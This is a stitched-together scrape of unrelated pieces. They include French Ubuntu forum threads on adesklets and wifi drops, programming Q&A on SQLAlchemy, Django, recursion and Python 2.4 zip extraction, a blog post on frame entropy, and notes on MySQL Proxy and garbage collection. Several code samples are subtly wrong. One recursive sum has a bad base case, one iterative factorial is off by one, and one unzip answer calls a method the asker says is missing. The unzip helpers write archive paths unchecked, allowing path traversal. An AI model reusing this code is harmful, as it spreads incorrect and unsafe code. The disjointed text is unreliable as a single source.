installé les lib? Comment le savoir ? Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Si tu n'as pas eu de messages d'erreur c'est qu'elles doivent être bien installées. En fait, ce que je veux dire c'est qu'il faut que tu ouvre un terminal, que tu fasses cd ton_chemin_vers_ton_desklets./nom_du_desklets.py Là il ne te demandera pas si tu veux le tester ou l'installer mais tu devrais avoir les messages d'erreurs éventuels (le terminal ne se fermera pas). Dernière modification par toma222 (Le 24/11/2005, à 21:13) Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy fabien@laptop:~$ cd /home/fabien/Desklets/acpumon-0.1.1 fabien@laptop:~/Desklets/acpumon-0.1.1$ ./acpumon.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./acpumon.py", line 631, in ? Events(dirname(__file__)).pause() File "./acpumon.py", line 293, in __init__ self.text=Text(self.top_canvas,self.config['font'],self.config.color(self.config['font_color']),'CPU Load 1000%','blah') File "./acpumon.py", line 248, in __init__ self.font=adesklets.load_font(font) File "/usr/lib/python2.4/commands.py", line 706, in load_font File "usr/lib/python2.4/site-packages/adesklets/commands_handler.py", line 103, in out adesklets.error_handler.ADESKLETSError: adesklets command error - font 'VeraBd/8' could not be loaded Exception exceptions.AttributeError: "Events instance has no attribute 'comm'" in <bound method Events.__del__ of <__main__.Events instance at 0xb7c2278c>> ignored Voilà... Et je ne vois rien En tout cas, merci de ta patience Hors ligne LacTeuS Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Alors pour ceux qui, comme Bismut, ont peur de tout "dégueulasser" en compilant les applications, vous pouvez utiliser "checkinstall" qui, après que vous ayez lancé un ./configure, se chargera de faire le make, puis il vous pondera un beau package en .deb qu'il installera par la suite. C'est le top sur un système debian comme Ubuntu pour la désinstallation Hors ligne Sallé Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Pour Sallé, est-ce que ça le fait pour tous les desklets ? Peux-tu en lancer un totalement en console et préciser les messages qui s'affichent, je veux dire en faisant cd /chemin_vers_ton_desklet ./nom_du_desklet re! j'ai testé à peu près tous les desklets, et ca l'a fait à chaque fois.... maintenant, en utilisant ta méthode la fenêtre du terminal reste affichée et ca donne ça, en enregistrant le desklet : jerome@Ubuntu:~$ cd /home/jerome/desklets/weather-0.0.4 jerome@Ubuntu:~/desklets/weather-0.0.4$ ./weather.py Do you want to (r)egister this desklet or to (t)est it? r Traceback (most recent call last): File "./weather.py", line 52, in ? import adesklets File "/usr/lib/python2.4/site-packages/PIL/__init__.py", line 43, in ? adesklets.error_handler.ADESKLETSError: adesklets process exited - Exception exceptions.AttributeError: <exceptions.AttributeError instance at 0xb7e082cc> in <bound method _Communicator.__del__ of <adesklets.communicator._Communicator instance at 0xb7b7b30c>> ignored jerome@Ubuntu:~/desklets/weather-0.0.4$ et en le testant : jerome@Ubuntu:~/desklets/weather-0.0.4$ ./weather.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./weather.py", line 52, in ? import adesklets File "/usr/lib/python2.4/site-packages/PIL/__init__.py", line 43, in ? adesklets.error_handler.ADESKLETSError: adesklets process exited - Exception exceptions.AttributeError: <exceptions.AttributeError instance at 0xb7e562cc> in <bound method _Communicator.__del__ of <adesklets.communicator._Communicator instance at 0xb7bc930c>> ignored jerome@Ubuntu:~/desklets/weather-0.0.4$ ensuite, beeeeennnnnn.... toujours rien ++ Hors ligne toma222 Re : [HOW TO] adesklets : installation sous Ubuntu Breezy Pour Sallé je ne vois pas d'où peut venir ton erreur, désolé. Si quelqu'un d'autre à une idée ? Ago, il semble que tu ais un problème de fonts, essaies de faire sudo apt-get install libfontconfig1-dev libxft2 Hors ligne Ago Re : [HOW TO] adesklets : installation sous Ubuntu Breezy J'ai installé via synaptic libfontconfig1-dev, libxft2 est déjà la version la plus récente installée, et ça marche toujours pas là J'ai droit à ça now: fabien@laptop:~/Desklets/acpumon-0.1.1$ ./acpumon.py Do you want to (r)egister this desklet or to (t)est it? t Now testing... ============================================================ If you do not see anything (or just an initial flicker in the top left corner of your screen), try `--help', and see the FAQ: `info adesklets'. ============================================================ Traceback (most recent call last): File "./acpumon.py", line 631, in ? Events(dirname(__file__)).pause() File "./acpumon.py", line 293, in __init__ self.text=Text(self.top_canvas,self.config['font'],self.config.color(self.config['font_color']),'CPU Load 1000%','blah') File "./acpumon.py", line 248, in __init__ self.font=adesklets.load_font(font) File "/usr/lib/python2.4/commands.py", line 706, in load_font File "usr/lib/python2.4/site-packages/adesklets/commands_handler.py", line 103, in out adesklets.error_handler.ADESKLETSError: adesklets command error - font 'VeraBd/8' could not be loaded Exception exceptions.AttributeError: "Events instance has no attribute 'comm'" in <bound method Events.__del__ of <__main__.Events instance at 0xb7be578c>> ignored Hors ligne
I frequently make models with Text columns that hold Markdown formatted richtext. My models look like this: class Document(Base): id = Column(Integer, primary_key=True) title = Column(Unicode(250)) description = Column(Text) description_html = Column(Text) My edit forms (a) read from and write to description and then (b) write the Markdown formatted version to description_html. My (Jinja2) view templates (c) load the HTML version with {{ doc.description_html|safe }}. I'd like to cut down these three recurring operations into one Column definition, like this: class Document(Base): id = Column(Integer, primary_key=True) title = Column(Unicode(250)) description = Column(MarkdownText) Where MarkdownText is a new column type that: Makes two columns in the database table (description and description_html), Upon writes to the column, also writes a Markdown formatted version to the html column, and Provides a __html__()method that returns the contents of the html column. This will allow it to be used from a Jinja2 template as{{ doc.description }}without thesafefilter. Question: Is #1 possible? Can I define a column that makes two columns?
It’s all about the entropy [ For more information on the Eideticker software I'm referring to, see this entry ] So recently I’ve been exploring new and different methods of measuring things that we care about on FirefoxOS — like startup time or amount of checkerboarding. With Android, where we have a mostly clean signal, these measurements were pretty straightforward. Want to measure startup times? Just capture a video of Firefox starting, then compare the frames pixel by pixel to see how much they differ. When the pixels aren’t that different anymore, we’re “done”. Likewise, to measure checkerboarding we just calculated the areas of the screen where things were not completely drawn yet, frame-by-frame. On FirefoxOS, where we’re using a camera to measure these things, it has not been so simple. I’ve already discussed this with respect to startup time in a previous post. One of the ideas I talk about there is “entropy” (or the amount of unique information in the frame). It turns out that this is a pretty deep concept, and is useful for even more things than I thought of at the time. Since this is probably a concept that people are going to be thinking/talking about for a while, it’s worth going into a little more detail about the math behind it. The wikipedia article on information theoretic entropy is a pretty good introduction. You should read it. It all boils down to this formula: You can see this section of the wikipedia article (and the various articles that it links to) if you want to break down where that comes from, but the short answer is that given a set of random samples, the more different values there are, the higher the entropy will be. Look at it from a probabilistic point of view: if you take a random set of data and want to make predictions on what future data will look like. If it is highly random, it will be harder to predict what comes next. Conversely, if it is more uniform it is easier to predict what form it will take. Another, possibly more accessible way of thinking about the entropy of a given set of data would be “how well would it compress?”. For example, a bitmap image with nothing but black in it could compress very well as there’s essentially only 1 piece of unique information in it repeated many times — the black pixel. On the other hand, a bitmap image of completely randomly generated pixels would probably compress very badly, as almost every pixel represents several dimensions of unique information. For all the statistics terminology, etc. that’s all the above formula is trying to say. So we have a model of entropy, now what? For Eideticker, the question is — how can we break the frame data we’re gathering down into a form that’s amenable to this kind of analysis? The approach I took (on the recommendation of this article) was to create a histogram with 256 bins (representing the number of distinct possibilities in a black & white capture) out of all the pixels in the frame, then run the formula over that. The exact function I wound up using looks like this: def _get_frame_entropy((i, capture, sobelized)): frame = capture.get_frame(i, True).astype('float') if sobelized: frame = ndimage.median_filter(frame, 3) dx = ndimage.sobel(frame, 0) # horizontal derivative dy = ndimage.sobel(frame, 1) # vertical derivative frame = numpy.hypot(dx, dy) # magnitude frame *= 255.0 / numpy.max(frame) # normalize (Q&D) histogram = numpy.histogram(frame, bins=256)[0] histogram_length = sum(histogram) samples_probability = [float(h) / histogram_length for h in histogram] entropy = -sum([p * math.log(p, 2) for p in samples_probability if p != 0]) return entropy [Context] The “sobelized” bit allows us to optionally convolve the frame with a sobel filter before running the entropy calculation, which removes most of the data in the capture except for the edges. This is especially useful for FirefoxOS, where the signal has quite a bit of random noise from ambient lighting that artificially inflate the entropy values even in places where there is little actual “information”. This type of transformation often reveals very interesting information about what’s going on in an eideticker test. For example, take this video of the user panning down in the contacts app: If you graph the entropies of the frame of the capture using the formula above you, you get a graph like this: [Link to original] The Y axis represents entropy, as calculated by the code above. There is no inherently “right” value for this — it all depends on the application you’re testing and what you expect to see displayed on the screen. In general though, higher values are better as it indicates more frames of the capture are “complete”. The region at the beginning where it is at about 5.0 represents the contacts app with a set of contacts fully displayed (at startup). The “flat” regions where the entropy is at roughly 4.25? Those are the areas where the app is “checkerboarding” (blanking out waiting for graphics or layout engine to draw contact information). Click through to the original and swipe over the graph to see what I mean. It’s easy to see what a hypothetical ideal end state would be for this capture: a graph with a smooth entropy of about 5.0 (similar to the start state, where all contacts are fully drawn in). We can track our progress towards this goal (or our deviation from it), by watching the eideticker b2g dashboard and seeing if the summation of the entropy values for frames over the entire test increases or decreases over time. If we see it generally increase, that probably means we’re seeing less checkerboarding in the capture. If we see it decrease, that might mean we’re now seeing checkerboarding where we weren’t before. It’s too early to say for sure, but over the past few days the trend has been positive: [Link to original] (note that there were some problems in the way the tests were being run before, so results before the 12th should not be considered valid) So one concept, at least two relevant metrics we can measure with it (startup time and checkerboarding). Are there any more? Almost certainly, let’s find them! Syndicated 2014-03-14 23:52:58 from William Lachance's Log
I have a custom form that creates a hidden input of a field: class MPForm( forms.ModelForm ): def __init__( self, *args, **kwargs ): super(MPForm, self).__init__( *args, **kwargs ) self.fields['mp_e'].label = "" #the trick :) class Meta: model = MeasurementPoint widgets = { 'mp_e': forms.HiddenInput() } exclude = ('mp_order') I have to do this little trick to "hide" the label, but what I want to do is remove it from the form. I create the form like this: forms.MPForm()
Can anyone tell me what exactly happens in a Recursion Program.. ?? A function calls itself over and over, until some condition is met. A silly example: How to walk 100 steps recursively: function walk(steps) { if (steps > 0) { // not there yet take 1 step walk(steps - 1); // we're 1 step closer, now walk the rest of the way } else { // we're there already, don't walk any further than requested echo "You're there!" } } walk(100); // go! This is what happens: walk(100): take 1 step walk(99): take 1 step walk(98): take 1 step walk(97): (...) walk(2): take 1 step walk(1): take 1 step walk(0): // "steps > 0" no longer true, use the "else" branch echo "You're there!" Note that the same thing could be accomplished with a loop ("iteratively"): function walk(steps) { for (c=steps; c > 0; c--) { // note the condition check - "c > 0" take 1 step } echo "You're there!" } walk(100); // go! The program flow would be a bit different, yet the result is the same: walk(100): c=100 take 1 step c=99 take 1 step c=98 take 1 step (...) c=2 take 1 step c=1 take 1 step c=0 // "c > 0" no longer true, exit loop echo "You're there!" It cannot be said whether recursion or iteration is always better. In this example, iteration (loop) is simpler to write and easier to understand than recursion; in other cases (e.g. traversing tree structures), recursion may be a better solution. Recursion, as opposed to iteration, is an algorithm or function design where a function calls itself. This could make a function a lot easier to understand, but makes it slower because a new stack must be created. Also, the stack memory usage will increase linearly with each call. Iteration, on the other hand, loops through all in one function, keeping the time complexity at O(n), and the space complexity fixed and not increasing with each iteration. For example, consider a function that adds consecutive numbers. Note that there's a formula to do this in one simple calculation (with O(1) time complexity) but let's just do this as an example. The recursive function might look like this: long consecutive(long a) { return a > 1 ? a + consecutive(a - 1) : a + 1; } You could run out of stack memory very quickly with this recursive calling. However, the iterative model is better for this: long consecutive(long a) { long result = 0, i; for (i = 1; i <= a; i++) result += i; return result; } A recursive program might look like this: def f(i): if i > 100: return 100 else: return f(i+1) print f(7) (python) The question is, what happens? The answer is it is better to think about this in terms of functions and try to write them out. So, we have the statement print This is a fairly trivial example but does demonstrate recursion quite well. An example of recursion: function foo(doRecurse) { alert("Foo was called"); if (doRecurse) { foo(false); } } foo(true); In this example, when foo gets called with true, it calls itself again with false. So, you will get two alert messages with the above code. The bit where the function foo calls the function foo is recursion. As others mentioned recursion is just a method calling itself. This has several advantages but also some disadvantages. As Example the typical calculation of factorials: Iterative version: int factorial(int factor) { int result = 1; int current_factor = 1; while (current_factor < factor) { result *= current_factor; ++current_factor; } return result; } Recursive version: int factorial(int factor) { if (factor == 1) return 1; return factor * factorial(factor - 1); } As you can see the code is a little shorter and slightly easier to read (if you are used to recursion). Now lets check the stack: It looks rougly like this factorial(5): factorial(4): factorial(3): factorial(2): factorial(1): 1 2+1 3+2+1 4+3+2+1 5+4+3+2+1 As you can see recursion requires more space on the stack (you have to add the return pointers, push and pop of variables and some other stuff a function call requires) and it is usually slower. The space problem can be reduced by using tail-optimized recursion, but thats too big a topic for this post, but just for completeness, an optimized version would look like this: int factorial(int current, int end, int *result) // result is a pointer, so changes // on result affect the original variable { if (current > end) return; *result = *result * current; factorial(current + 1, end, result); } The only place where recursion is really helpful is (IMHO) walking through tree structures. A function calls itself. This can be used instead of iteration, but is generally less efficient as a new stack has to be allocated for each function call.
I'm having a hard time figuring out how to unzip a zip file with 2.4. extract() is not included in 2.4. I'm restricted to using 2.4.4 on my server. Can someone please provide a simple code example? You have to use import zipfile import os.path import os zfile = zipfile.ZipFile("test.zip") for name in zfile.namelist(): (dirname, filename) = os.path.split(name) print "Decompressing " + filename + " on " + dirname if not os.path.exists(dirname): os.makedirs(dirname) zfile.extract(name, dirname) There's some problem with Vinko's answer (at least when I run it). I got: IOError: [Errno 13] Permission denied: '01org-webapps-countingbeads-422c4e1/' Here's how to solve it: # unzip a file def unzip(path): zfile = zipfile.ZipFile(path) for name in zfile.namelist(): (dirname, filename) = os.path.split(name) if filename == '': # directory if not os.path.exists(dirname): os.mkdir(dirname) else: # file fd = open(name, 'w') fd.write(zfile.read(name)) fd.close() zfile.close() Modifying Ovilia's answer so that you can specify the destination directory as well: def unzip(zipFilePath, destDir): zfile = zipfile.ZipFile(zipFilePath) for name in zfile.namelist(): (dirName, fileName) = os.path.split(name) if fileName == '': # directory newDir = destDir + '/' + dirName if not os.path.exists(newDir): os.mkdir(newDir) else: # file fd = open(destDir + '/' + name, 'wb') fd.write(zfile.read(name)) fd.close() zfile.close() Not fully tested, but it should be okay: import os from zipfile import ZipFile, ZipInfo class ZipCompat(ZipFile): def __init__(self, *args, **kwargs): ZipFile.__init__(self, *args, **kwargs) def extract(self, member, path=None, pwd=None): if not isinstance(member, ZipInfo): member = self.getinfo(member) if path is None: path = os.getcwd() return self._extract_member(member, path) def extractall(self, path=None, members=None, pwd=None): if members is None: members = self.namelist() for zipinfo in members: self.extract(zipinfo, path) def _extract_member(self, member, targetpath): if (targetpath[-1:] in (os.path.sep, os.path.altsep) and len(os.path.splitdrive(targetpath)[1]) > 1): targetpath = targetpath[:-1] if member.filename[0] == '/': targetpath = os.path.join(targetpath, member.filename[1:]) else: targetpath = os.path.join(targetpath, member.filename) targetpath = os.path.normpath(targetpath) upperdirs = os.path.dirname(targetpath) if upperdirs and not os.path.exists(upperdirs): os.makedirs(upperdirs) if member.filename[-1] == '/': if not os.path.isdir(targetpath): os.mkdir(targetpath) return targetpath target = file(targetpath, "wb") try: target.write(self.read(member.filename)) finally: target.close() return targetpath I am testing in Python 2.7.3rc2 and the the Thus the check does not evaluate to So I modified the code to check if the def unzip(zipFilePath, destDir): zfile = zipfile.ZipFile(zipFilePath) for name in zfile.namelist(): (dirName, fileName) = os.path.split(name) # Check if the directory exisits newDir = destDir + '/' + dirName if not os.path.exists(newDir): os.mkdir(newDir) if not fileName == '': # file fd = open(destDir + '/' + name, 'wb') fd.write(zfile.read(name)) fd.close() zfile.close()
In http://jan.kneschke.de/2007/8/1/mysql-proxy-learns-r-w-splitting we did a first implementation on idea of sending non-transactional reads to the slaves and writes and transactions to the master. While that was mostly a proof of concept it already worked pretty well. In this second round on R/W splitting several issues are taken care of: SELECT SQL_CALC_FOUND_ROWS … + SELECT FOUND_ROWS()INSERT ... + SELECT LAST_INSERT_ID()default_db not in sync between client and backend These changes should make Read/Write splitting more robust and make it a drop-in for more users. Up to now we used the tutorial-keepalive.lua to implement the Read/Write-splitting. As the name says, it is a tutorial for connection keepalive, while rw-splitting is far more complex. To address this the rw-splitting is now a separate script in th lib/ folder which uses a set of base-classes we ship now. $ cd trunk/ $ LUA_PATH="lib/?.lua" ./src/mysql-proxy \ --proxy-lua-script=./lib/rw-splitting.lua \ --proxy-read-only-backend-addresses=:3307 \ --proxy-read-only-backend-addresses=:3308 \ --proxy-read-only-backend-addresses=:3309 To start it we have to set LUA_PATH for now, you tell where it find the standard-proxy libs. By default the rw-splitting script will spit out a lot debug information about the different stages. You can either disable it in the script: -- debug proxy.global.config.is_debug = true or by sending: set GLOBAL rwsplit.debug = 0 on a connection. [connect_server] [1].connected_clients = 0 [1].idling_connections = 0 [1].type = 1 [1].state = 0 [1] open new connection [read_query] current backend = 0 client default db = repl client username = root query = select * from foo sending to backend : 127.0.0.1:3306 is_slave : false server default db: repl server username : root in_trans : false in_calc_found : false COM_QUERY : true One of the basic problems with rw-splitting is that each connection has a state, e.g. the default_db. If you switch to another backend you have to make sure that before we issue a SQL query, that also set the new default-db, if they are not in sync. [read_query] current backend = 0 client default db = mysql client username = root query = select * from user server default db: repl client default db: mysql syncronizing The client-side did a USE mysql against the master and wanted to SELECT from the a slave afterwards. As the connection the slave was still using repl from the previous query we have apply the DB-change now. For achieve this we insert a USE mysql before sending the SELECT to the slave. In case the DB want to switch to doesn’t exist on the slave, you will get an error like: ERROR 1000 (00S00): can't change DB 'norepl' to on slave ':3307' for the SELECT statement. Not all statements in MySQL are stateless and allow easy R/W splitting. Some of them need special support to make sure that still work: SELECT SQL_CALC_FOUND_ROWS ... will lead to a SELECT FOUND_ROWS() which has to be executed on the same connectionINSERTing into table with auto_increment fields might lead to a SELECT LAST_INSERT_ID() which has to be execute on the same master-connection.SHOW WARNINGS is similar The solution is simple: don’t give away the connection in that cases and don’t send the SELECT FOUND_ROWS() to a slave. For sure there are some more statements which might not harmonize with r/w splitting. For example prepared statements. But that’s another story.
Bear in mind that the locking is very expensive, and it happens every time you hand objects around between smart pointers - even when the object is currently owned by one thread (the smart pointer library doesn't know that). Given this, there may be a rule of thumb applicable here (I'm happy to be corrected!) If the follow things apply to you: You have complex data structures that would be difficult to write destructors for (or where STL-style value semantics would be inappropriate, by design) so you need smart pointers to do it for you, and You're using multiple threads that share these objects, and You care about performance as well as correctness ... then actual garbage collection may be a better choice. Although GC has a bad reputation for performance, it's all relative. I believe it compares very favourably with locking smart pointers. It was an important part of why the CLR team chose true GC instead of something using reference counting. See this article, in particular this stark comparison of what reference assignment means if you have counting going on: no ref-counting: a = b; ref counting: if (a != null) if (InterlockedDecrement(ref a.m_ref) == 0) a.FinalRelease(); if (b != null) InterlockedIncrement(ref b.m_ref); a = b;
Alex0000 Déconnexion sur Batterie [Samsung] Bonjour à tous J'ai un problème récurrent avec mon wifi quelque soit l'os ou la version de celui-ci. Après un petit temps sur batterie ( entre 5min et 1h) il se déconnecte de plus le gestionnaire de connexion ne montre plus aucun wifi. Sur Windows, l'outils de résolution de problème redémarre la carte et tout rentre dans l'ordre, si on omet la déconnexion ... Je n'ai pas trouver la commande qui permet de redémarrer la carte, ou une solution durable. Par contre si j'introduits : sudo /etc/init.d/networking restart ça fait tout planter sous 12.10, et sous 11.10 rien ne se passait ... Merci d'avance >> cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.10 DISTRIB_CODENAME=quantal DISTRIB_DESCRIPTION="Ubuntu 12.10" >> lsusb Bus 001 Device 002: ID 0ac8:c33f Z-Star Microelectronics Corp. Webcam Bus 008 Device 002: ID 0a5c:2151 Broadcom Corp. Bluetooth Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 008 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub >> lspci -k -nn | grep -A 3 -i net 02:00.0 Network controller [0280]: Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) [168c:002b] (rev 01) Subsystem: Askey Computer Corp. Device [144f:7167] Kernel driver in use: ath9k Kernel modules: ath9k 04:00.0 Ethernet controller [0200]: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller [10ec:8136] (rev 02) Subsystem: Samsung Electronics Co Ltd Device [144d:c060] Kernel driver in use: r8169 Kernel modules: r8169 >> sudo lshw -C network *-network description: Interface réseau sans fil produit: AR9285 Wireless Network Adapter (PCI-Express) fabriquant: Atheros Communications Inc. identifiant matériel: 0 information bus: pci@0000:02:00.0 nom logique: wlan0 version: 01 numéro de série: 00:26:b6:66:d3:d6 bits: 64 bits horloge: 33MHz fonctionnalités: pm msi pciexpress bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=ath9k driverversion=3.5.0-19-generic firmware=N/A ip=192.168.1.113 latency=0 link=yes multicast=yes wireless=IEEE 802.11bgn ressources: irq:16 mémoire:f6000000-f600ffff *-network description: Ethernet interface produit: RTL8101E/RTL8102E PCI Express Fast Ethernet controller fabriquant: Realtek Semiconductor Co., Ltd. identifiant matériel: 0 information bus: pci@0000:04:00.0 nom logique: eth0 version: 02 numéro de série: 00:24:54:18:83:2b taille: 10Mbit/s capacité: 100Mbit/s bits: 64 bits horloge: 33MHz fonctionnalités: pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=half latency=0 link=no multicast=yes port=MII speed=10Mbit/s ressources: irq:43 portE/S:3000(taille=256) mémoire:f4000000-f4000fff mémoire:f2000000-f200ffff mémoire:f2020000-f203ffff >> lsmod Module Size Used by samsung_laptop 14532 0 rfcomm 46619 12 parport_pc 32688 0 bnep 18140 2 ppdev 17073 0 binfmt_misc 17500 1 snd_hda_codec_hdmi 32007 1 snd_hda_codec_realtek 77876 1 ip6t_REJECT 12574 1 xt_hl 12521 6 ip6t_rt 12558 3 nf_conntrack_ipv6 14054 7 nf_defrag_ipv6 13158 1 nf_conntrack_ipv6 ipt_REJECT 12541 1 xt_LOG 17349 10 xt_limit 12711 13 xt_tcpudp 12603 18 xt_addrtype 12635 4 xt_state 12578 14 joydev 17457 0 ip6table_filter 12815 1 ip6_tables 27207 2 ip6t_rt,ip6table_filter nf_conntrack_netbios_ns 12665 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns nf_nat_ftp 12649 0 nf_nat 25254 1 nf_nat_ftp arc4 12529 2 nf_conntrack_ipv4 14480 9 nf_nat nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 nf_conntrack_ftp 13359 1 nf_nat_ftp snd_hda_intel 33491 5 ath9k 131308 0 snd_hda_codec 134212 3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel mac80211 539908 1 ath9k i915 520629 3 nf_conntrack 82633 8 nf_conntrack_ipv6,xt_state,nf_conntrack_netbios_ns,nf_conntrack_broadcast,nf_nat_ftp,nf_nat,nf_conntrack_ipv4,nf_conntrack_ftp snd_hwdep 13602 1 snd_hda_codec snd_pcm 96580 4 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec ath9k_common 14055 1 ath9k snd_seq_midi 13324 0 drm_kms_helper 46784 1 i915 snd_rawmidi 30512 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 2 snd_seq_midi,snd_seq_midi_event coretemp 13400 0 snd_timer 29425 2 snd_pcm,snd_seq ath9k_hw 395218 2 ath9k,ath9k_common snd_seq_device 14497 3 snd_seq_midi,snd_rawmidi,snd_seq drm 275528 4 i915,drm_kms_helper snd 78734 19 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device iptable_filter 12810 1 ath 23827 3 ath9k,ath9k_common,ath9k_hw ip_tables 26995 1 iptable_filter microcode 22803 0 psmouse 95552 0 btusb 22474 0 i2c_algo_bit 13413 1 i915 lp 17759 0 serio_raw 13215 0 lpc_ich 17061 0 video 19335 2 samsung_laptop,i915 soundcore 15047 1 snd cfg80211 206566 3 ath9k,mac80211,ath bluetooth 209199 22 rfcomm,bnep,btusb parport 46345 3 parport_pc,ppdev,lp snd_page_alloc 18484 2 snd_hda_intel,snd_pcm x_tables 29711 13 ip6t_REJECT,xt_hl,ip6t_rt,ipt_REJECT,xt_LOG,xt_limit,xt_tcpudp,xt_addrtype,xt_state,ip6table_filter,ip6_tables,iptable_filter,ip_tables mac_hid 13205 0 r8169 61650 0 >> iwconfig wlan0 IEEE 802.11bgn ESSID:"homell" Mode:Managed Frequency:2.412 GHz Access Point: 00:C0:49:DA:DA:08 Bit Rate=48 Mb/s Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:off Link Quality=42/70 Signal level=-68 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:1246 Invalid misc:82226 Missed beacon:0 >> ifconfig -a eth0 Link encap:Ethernet HWaddr 00:24:54:18:83:2b UP BROADCAST MULTICAST MTU:1500 Metric:1 Packets reçus:0 erreurs:0 :0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 Octets reçus:0 (0.0 B) Octets transmis:0 (0.0 B) lo Link encap:Boucle locale inet adr:127.0.0.1 Masque:255.0.0.0 adr inet6: ::1/128 Scope:Hôte UP LOOPBACK RUNNING MTU:16436 Metric:1 Packets reçus:12999 erreurs:0 :0 overruns:0 frame:0 TX packets:12999 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 Octets reçus:1715972 (1.7 MB) Octets transmis:1715972 (1.7 MB) wlan0 Link encap:Ethernet HWaddr 00:26:b6:66:d3:d6 inet adr:192.168.1.113 Bcast:192.168.1.255 Masque:255.255.255.0 adr inet6: fe80::226:b6ff:fe66:d3d6/64 Scope:Lien UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Packets reçus:636704 erreurs:0 :0 overruns:0 frame:0 TX packets:793819 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 Octets reçus:458508453 (458.5 MB) Octets transmis:447953157 (447.9 MB) >> sudo iwlist scan wlan0 Scan completed : Cell 01 - Address: 00:C0:49:DA:DA:08 Channel:1 Frequency:2.412 GHz (Channel 1) Quality=46/70 Signal level=-64 dBm Encryption key:on ESSID:"homell" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 22 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=00000003723316ba Extra: Last beacon: 20ms ago IE: Unknown: 0006686F6D656C6C IE: Unknown: 010582848B962C IE: Unknown: 030101 IE: Unknown: 0706455520010D14 IE: Unknown: 2A0100 IE: Unknown: 32080C1218243048606C IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK IE: Unknown: DD0A0800280101000200FF0F Cell 02 - Address: 74:EA:3A:C8:2A:BA Channel:1 Frequency:2.412 GHz (Channel 1) Quality=26/70 Signal level=-84 dBm Encryption key:on ESSID:"TP LINK" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s Bit Rates:9 Mb/s; 18 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=000003784ac6f181 Extra: Last beacon: 240ms ago IE: Unknown: 00075450204C494E4B IE: Unknown: 010882848B960C183048 IE: Unknown: 030101 IE: Unknown: 050400010000 IE: Unknown: 2A0100 IE: Unknown: 32041224606C IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : TKIP Pairwise Ciphers (2) : TKIP CCMP Authentication Suites (1) : PSK Preauthentication Supported Cell 03 - Address: 00:0D:93:7E:5A:84 Channel:6 Frequency:2.437 GHz (Channel 6) Quality=33/70 Signal level=-77 dBm Encryption key:on ESSID:"vax" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000021d69900189 Extra: Last beacon: 2036ms ago IE: Unknown: 0003766178 IE: Unknown: 010482848B96 IE: Unknown: 030106 IE: Unknown: 050401030000 IE: Unknown: 2A0100 IE: Unknown: 2F0100 IE: Unknown: 32080C1218243048606C IE: Unknown: DD0700039301030000 IE: Unknown: DD06001018020300 IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK Cell 04 - Address: 00:30:F1:FB:1D:A0 Channel:6 Frequency:2.437 GHz (Channel 6) Quality=29/70 Signal level=-81 dBm Encryption key:on ESSID:"Kamerdelle 83 (philips)" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 22 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master 